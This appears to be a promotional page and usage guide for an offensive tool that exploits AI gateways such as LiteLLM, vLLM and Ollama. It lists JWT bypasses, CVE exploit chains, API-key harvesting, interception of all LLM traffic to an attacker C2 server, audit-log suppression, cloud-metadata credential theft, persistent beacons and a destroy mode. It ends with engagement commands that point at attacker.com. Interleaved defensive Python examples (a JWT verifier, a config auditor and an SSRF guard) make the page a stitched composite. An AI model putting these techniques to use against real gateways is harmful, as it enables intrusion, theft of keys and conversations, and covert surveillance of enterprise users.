You deployed an AI gateway and called it infrastructure. We called it a target. Every LiteLLM proxy, every vLLM endpoint, every Ollama server — owned, siphoned, and transmitting your enterprise LLM traffic to us.
SPECTER PARASITE is a universal AI gateway exploitation engine. It doesn't assume a specific gateway — it detects what's running, finds the attack surface, and exploits it. Every AI gateway shares the same architecture: an HTTP endpoint, an auth layer, a config store, an outbound connection, and a process runtime. PARASITE attacks all five.
The 7 pluggable CVE modules are accelerators. The 7 remaining subsystems work against any gateway regardless of patch level. If it speaks HTTP and proxies LLM traffic, PARASITE can own it.
AUTHORIZED USE ONLY — INJECT gate requires Ed25519 PEM key (PARASITE_KEY). UNLEASHED gate additionally requires ROE file containing "gateway exploitation authorised". DESTROY gate requires exact confirmation string. All operations require explicit written authorisation.
Fingerprint 20+ gateway types via HTTP probes, response pattern matching, port hints, and banner extraction. LiteLLM, vLLM, Ollama, LM Studio, LocalAI, TGWUI, OpenWebUI, HuggingFace TGI, Triton Inference Server, Ray Serve, BentoML, MLflow Serving, Dify, Flowise, nginx-ui, and any custom OpenAI-compatible wrapper. CIDR range scanning support.
Deep auth characterisation. JWT arsenal: alg:none bypass (removes signature entirely), HS256 brute force (16 weak secrets), RS256→HS256 algorithm confusion (server's public key as HMAC secret). Werkzeug debugger PIN calculation (real SHA1+pinsalt algorithm — all inputs obtainable via LFI). Host header bypass. Default credential spray. Admin route enumeration.
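The three JWT weaknesses listed above share one root cause: the verifier lets the token's own header pick the algorithm, or it accepts a guessable HMAC secret. The Python verifier below is an added example, not code from the tool this page describes or from any gateway project; it pins the algorithm on the server side, and the 32-byte secret floor and every function name in it are assumptions.

```python
import base64
import hashlib
import hmac
import json

MIN_SECRET_BYTES = 32  # assumption: local policy floor for HMAC secrets


class TokenRejected(Exception):
    """Raised for any token that fails the pinned-algorithm policy."""


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_json(part):
    try:
        return json.loads(base64.urlsafe_b64decode(part + "=" * (-len(part) % 4)))
    except ValueError:
        raise TokenRejected("unparseable token segment")


def pinned_header(token, expected_alg):
    """Gate run before any signature check: the server picks the algorithm."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise TokenRejected("malformed or unsigned token")
    header = decode_json(parts[0])
    if not isinstance(header, dict) or header.get("alg") != expected_alg:
        raise TokenRejected("alg does not match the pinned algorithm")
    return parts


def verify_hs256(token, secret):
    """Return the claims of a valid HS256 token or raise TokenRejected."""
    if len(secret) < MIN_SECRET_BYTES or b"-----BEGIN" in secret:
        raise TokenRejected("secret is too short or is PEM key material")
    head, body, sig = pinned_header(token, "HS256")
    mac = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_encode(mac).encode(), sig.encode()):
        raise TokenRejected("bad signature")
    return decode_json(body)


def make_token(header, claims, secret):  # builds constructed sample tokens
    parts = [b64url_encode(json.dumps(p).encode()) for p in (header, claims)]
    mac = hmac.new(secret, ".".join(parts).encode(), hashlib.sha256).digest()
    return ".".join(parts + [b64url_encode(mac)])
```

A service that issues RS256 tokens applies the same gate with `pinned_header(token, "RS256")` before handing the token to its RSA verifier, so a token that declares HS256 never reaches an HMAC code path.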
7 CVE modules: CVE-2026-42271/48710 (LiteLLM BadHost+MCP RCE chain CVSS 10.0), CVE-2026-42208 (LiteLLM SQLi CVSS 9.3 — dumps litellm_proxy_keys), CVE-2026-22778 (vLLM JPEG2000 heap overflow CVSS 9.8 — real payload), CVE-2026-7482 "Bleeding Llama" (Ollama GGUF OOB heap read CVSS 9.8 — real binary), CVE-2026-33032 (nginx-ui MCP endpoint CVSS 9.8), CVE-2026-25536 (MCP cross-client session leak), CVE-2024-5483 (vLLM LoRA SSRF CVSS 9.0).
API key harvest from all sources: environment variables, config files (YAML/TOML/.env), heap dumps, LiteLLM config model list. Provider classification with burn rate: Anthropic ($3.00/hr), OpenAI ($2.50/hr), Azure OpenAI ($2.00/hr), AWS Bedrock, Google Vertex AI, Groq, Cohere, HuggingFace, DeepSeek, Mistral AI.
LiteLLM CustomLogger subclass injection — captures all prompts, responses, metadata, tool calls to attacker C2 via daemon thread (non-blocking). ASGI middleware injection for vLLM/FastAPI. nginx proxy_pass mirror intercept config. Audit log suppression (clears callbacks and success_callback lists). Every enterprise LLM query goes through you.
Cloud metadata pivot via SSRF or direct RCE: AWS IMDS v2 (PUT token first), GCP metadata server (Metadata-Flavor header), Azure MSI endpoint. K8s service account token extraction. Colocated service discovery (Qdrant, Prometheus, Redis, PostgreSQL). Provider account pivot — validate harvested keys against Anthropic/OpenAI/AWS/GCP APIs.
Persistent C2 mechanisms: systemd network-helper.service (Restart=always, masked as system service), K8s CronJob in kube-system every 6 hours, Docker escape via /var/run/docker.sock privileged container with host filesystem bind mount, LiteLLM phantom model routing (all gpt-4o traffic silently proxied through attacker endpoint). Beacon posts env+credentials every 15 minutes.
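The phantom model routing item above changes where a model alias sends its traffic; when that change lands in the gateway config it appears as an unexpected `api_base` override. The following is an added example, not code from LiteLLM or from the tool this page describes: it audits an already parsed LiteLLM config, and the approved host list, the sample config and the `audit_model_list` name are assumptions.

```python
from urllib.parse import urlsplit

# Assumption: the upstream hosts this deployment is approved to route to.
APPROVED_HOSTS = {"api.openai.com", "api.anthropic.com"}
APPROVED_SUFFIXES = (".openai.azure.com",)


def audit_model_list(config, env=None):
    """Return sorted (model_name, issue) findings for a parsed LiteLLM config."""
    env = env or {}
    findings = set()
    for entry in config.get("model_list") or []:
        name = entry.get("model_name", "<unnamed>")
        api_base = (entry.get("litellm_params") or {}).get("api_base")
        if api_base is None:
            continue  # no override: the provider's default endpoint is used
        if str(api_base).startswith("os.environ/"):
            var = api_base.split("/", 1)[1]
            if var not in env:
                findings.add((name, f"api_base env var unresolved: {var}"))
                continue
            api_base = env[var]
        url = urlsplit(str(api_base))
        host = (url.hostname or "").lower()  # hostname ignores any user@ prefix
        if url.scheme != "https":
            findings.add((name, f"api_base is not https: {api_base}"))
        if host not in APPROVED_HOSTS and not host.endswith(APPROVED_SUFFIXES):
            findings.add((name, f"api_base host not approved: {host or '<none>'}"))
    return sorted(findings)


# Constructed sample config; model strings and hosts are placeholders.
SAMPLE_CONFIG = {
    "model_list": [
        {"model_name": "gpt-4o",
         "litellm_params": {"model": "openai/gpt-4o"}},
        {"model_name": "gpt-4o",
         "litellm_params": {"model": "openai/gpt-4o",
                            "api_base": "http://relay.example.net:8443/v1"}},
        {"model_name": "claude",
         "litellm_params": {"model": "anthropic/claude",
                            "api_base": "https://api.anthropic.com@relay.example.net"}},
        {"model_name": "azure-gpt",
         "litellm_params": {"model": "azure/gpt-4o",
                            "api_base": "os.environ/AZURE_API_BASE"}},
    ]
}
SAMPLE_ENV = {"AZURE_API_BASE": "https://corp-eu.openai.azure.com"}
```

Running `audit_model_list(SAMPLE_CONFIG, SAMPLE_ENV)` on a schedule and diffing the result against the last known-good run turns a silent routing change into an alert.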
PST-{hex12} Ed25519-signed canonical JSON. WARLORD-compatible. Full MITRE ATT&CK mapping: T1190/T1552.001/T1557/T1565.001/T1078/T1071.001. MITRE ATLAS: AML.T0043/T0056/T0040/T0051. Credential burn rate calculation. Pivot chain documentation. 5 WMD classes.
LiteLLM BadHost + MCP test endpoint chained RCE. Host header bypass grants access to /mcp/test endpoint. server_url parameter receives command injection payload. Zero authentication required. Confirmed on LiteLLM <=1.83.6.
LiteLLM SQL injection in authentication path. UNION-based extraction of litellm_proxy_keys table — dumps all API keys in the database. Supports SQLite, PostgreSQL, MySQL dialects. Boolean-blind and error-based fallback modes.
vLLM video_url parameter passes to OpenCV → FFmpeg 5.1.x. Real JPEG2000 payload with XTsiz×YTsiz uint32 overflow trigger. Wrapped in valid AVI RIFF container (BITMAPINFOHEADER biCompression=0x47504A4A). Heap overflow in ff_j2k_init_component().
Ollama <=0.17.0. Real GGUF binary: tensor type 0xFFFF indexes past 27-entry ggml_type_traits[] array boundary. Heap read captures env vars, API keys, conversation history from process memory. 300K+ servers exposed at disclosure. Upload via PUT /api/blobs/sha256:{digest}.
nginx-ui unauthenticated MCP endpoint. POST /mcp with tool=nginx_config_write rewrites nginx configuration. Full NGINX config takeover without authentication. Gateway becomes transparent proxy to attacker.
MCP SDK StreamableHTTP cross-client session data leak via sequential session IDs. vLLM LoRA adapter loading SSRF — fetch_remote_model_from_url reaches AWS IMDS, GCP metadata server, Azure MSI endpoint. Cloud credential extraction from the model server itself.
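The LoRA adapter SSRF above, like the SSRF route to cloud metadata described earlier on this page, depends on the model server fetching whatever URL it is handed. The Python guard below is an added example, not vLLM's code and not part of the tool described here: it vets a remote-model URL before any fetch, and `vet_fetch_url`, the https-only policy and the injectable resolver are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


class BlockedURL(Exception):
    """Raised when a remote-fetch URL fails the egress policy."""


def is_public(ip_text):
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 6 and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # judge ::ffff:a.b.c.d by its IPv4 address
    return addr.is_global  # False for link-local, loopback, private, CGNAT


def system_resolver(host, port):
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def vet_fetch_url(url, resolve=system_resolver):
    """Return (host, port, vetted_ips) for an allowed URL, else raise BlockedURL."""
    try:
        parts = urlsplit(url)
        port = parts.port or 443
    except ValueError as exc:
        raise BlockedURL(f"unparseable URL: {exc}")
    if parts.scheme != "https":
        raise BlockedURL(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname or parts.username or parts.password:
        raise BlockedURL("missing host or embedded credentials")
    try:
        addrs = resolve(parts.hostname, port)
    except OSError as exc:
        raise BlockedURL(f"resolution failed: {exc}")
    blocked = [a for a in addrs if not is_public(a)]
    if blocked or not addrs:
        raise BlockedURL(f"{parts.hostname} maps to non-public {blocked}")
    # Callers must connect to one of these IPs, not re-resolve the name,
    # or a second DNS answer can point at the metadata service (rebinding).
    return parts.hostname, port, addrs
```

The fetch that follows must also refuse HTTP redirects or pass each redirect target back through `vet_fetch_url`, since a vetted public host can still answer with a redirect to an internal address.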
SCAN: identify LiteLLM on port 4000, confidence 0.95
PROBE: detect no-auth or JWT bypass opportunity
BREACH: CVE-2026-42208 SQL injection → dump litellm_proxy_keys table
SIPHON: extract Anthropic/OpenAI/Azure keys from config YAML + env vars
INTERCEPT: inject LiteLLM CustomLogger → all enterprise LLM traffic to C2
IMPLANT: systemd network-helper.service → persistent C2 beacon
TRAVERSE: AWS IMDS v2 via SSRF → STS credentials → cloud pivot
SCAN: Ollama detected on port 11434 (/ returns "Ollama is running")
BREACH: CVE-2026-7482 — craft GGUF with tensor type 0xFFFF
BREACH: PUT /api/blobs/sha256:{digest} → POST /api/create with malicious modelfile
SIPHON: regex scan streaming response for API key patterns (sk-ant/sk-/AKIA/AIza)
REPORT: PST-signed report with harvested secrets and heap dump excerpt
SCAN: vLLM on port 8000 — /health returns vllm_version
BREACH: CVE-2024-5483 — LoRA adapter URL → AWS IMDS http://169.254.169.254/latest/meta-data/
TRAVERSE: extract instance credentials from IMDSv2 response
TRAVERSE: AWS STS GetCallerIdentity → IAM enumeration → S3/Secrets Manager pivot
OPEN: No requirements. SCAN, PROBE, REPORT available.
INJECT: PARASITE_KEY env var pointing to Ed25519 PEM private key. BREACH, SIPHON available.
UNLEASHED: INJECT + PARASITE_ROE_FILE containing "gateway exploitation authorised". INTERCEPT, TRAVERSE, IMPLANT available.
DESTROY: UNLEASHED + exact string "I UNDERSTAND THIS WILL DESTROY GATEWAY INFRASTRUCTURE". Infrastructure annihilation.
pip install -e /path/to/red-specter-specter-parasite

# Scan + fingerprint a target
parasite scan --target 192.168.1.100 --ports 4000,8000,11434

# Full engagement (OPEN gate — no credentials needed)
parasite engage --target 192.168.1.100:4000

# With INJECT gate (BREACH + SIPHON)
export PARASITE_KEY=/path/to/parasite.key
parasite engage --target 192.168.1.100:4000 --gate inject

# Full pipeline (UNLEASHED — includes INTERCEPT + TRAVERSE + IMPLANT)
export PARASITE_KEY=/path/to/parasite.key
export PARASITE_ROE_FILE=/path/to/roe.txt # must contain "gateway exploitation authorised"
parasite engage --target 192.168.1.100:4000 --gate unleashed --c2-url http://attacker.com:9999